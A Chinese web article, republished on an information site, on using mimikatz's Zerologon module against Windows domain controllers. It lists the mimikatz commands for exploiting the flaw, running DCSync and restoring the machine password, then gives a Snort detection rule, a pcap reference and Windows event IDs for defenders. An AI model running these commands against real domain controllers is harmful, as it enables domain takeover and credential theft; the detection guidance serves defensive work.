mimikatz怎么利用zerologon攻击域控服务器
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,本篇内容主要讲解"mimikatz怎么利用zerologon攻击域控服务器",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"mimikatz怎么利用zerol
千家信息网最后更新 2025年12月02日mimikatz怎么利用zerologon攻击域控服务器
本篇内容主要讲解"mimikatz怎么利用zerologon攻击域控服务器",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"mimikatz怎么利用zerologon攻击域控服务器"吧!
0x01 前言
mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix
官方利用截图如下
mimikatz相关命令
lsadump::zerologon /target:dc.hacke.testlab /account:dc$poclsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon漏洞攻击域控服务器lsadump::dcsynclsadump::postzerologon /target:conttosson.locl /account:dc$ #恢复密码

snort 检测规则
alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
pcap包
利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址
windows事件管理器自查
在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805
在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查
当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。 管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发 5830,5831 如果"域控制器:允许易受攻击的Netlogon安全通道连接"组策略允许连接。
mimikatz通过zerologon攻击成功后,将会留下事件id为4648。
到此,相信大家对"mimikatz怎么利用zerologon攻击域控服务器"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!
攻击
事件
服务器
服务
漏洞
管理
安全
内容
规则
通道
重点
学习
自查
实用
更深
成功
兴趣
前言
同学
命令
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
lce服务器价格
网络安全文明上网这几个字体
信息网络安全使用管理规定
学习网络安全需要什么样的书
values数据库
数据库比对的方法
软件开发中的持续集成
oracle数据库文件夹名
来宾计算机网络技术培训
世界十大互联网科技排名
西安软件开发需要多少钱
数据库可以有几个主码
数据库用户账号管理
单片机串口循环发送数据库
网格数据库管理
中科院网络安全研究生导师
思讯不能连接到数据库
软件开发必备常识
先锋服务器一体机
服务器内存报错
网络安全问题与治理
深圳weiqiao网络技术
揭阳网络科技软件开发
学科网高端数据库试用
国内网络技术排名
校园网络安全宣传
概述如何进行大学生网络安全教育
阿里云轻量服务器设置防火墙
宝塔出现数据库连接失败
扫恶除霸网络安全